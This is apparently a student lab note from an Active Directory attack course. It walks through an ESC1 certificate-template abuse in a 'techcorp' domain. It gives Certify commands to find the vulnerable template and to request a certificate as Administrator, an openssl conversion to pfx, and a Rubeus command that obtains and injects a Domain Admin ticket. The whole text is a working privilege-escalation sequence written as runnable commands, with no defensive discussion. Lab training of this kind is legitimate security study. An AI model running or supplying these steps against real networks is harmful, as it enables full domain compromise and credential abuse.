- In techcorp, the user pawadmin has enrollment rights to a template -ForAdminsofPrivilegedAccessWorkstations
- The template has ENROLLEE_SUPPLIES_SUBJECT value for msPKICertificates-Name-Flag. (ESC1)
- This means pawadmin can request certificate for ANY user.
- Note that this does not show up when we enumerate vulnerable templates in Certify. Use:
Certify.exe find
Certify.exe find /enrolleeSuppliesSubject
- Request a certificate for DA!
Certify.exe request /ca:Techcorp-DC.techcorp.local\TECHCORP-DC-CA /template:ForAdminsofPrivilegedAccessWorkstations /altname:Administrator
- Convert from cert.pem to pfx:
openssl.exe pkcs12 -in C:\AD\cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\DA.pfx
- Request DA TGT and inject it:
C:\AD\Tools\Rubeus.exe asktgt /user:Administrator /certificate:C:\AD\DA.pfx /password:studentuser47 /nowrap /ptt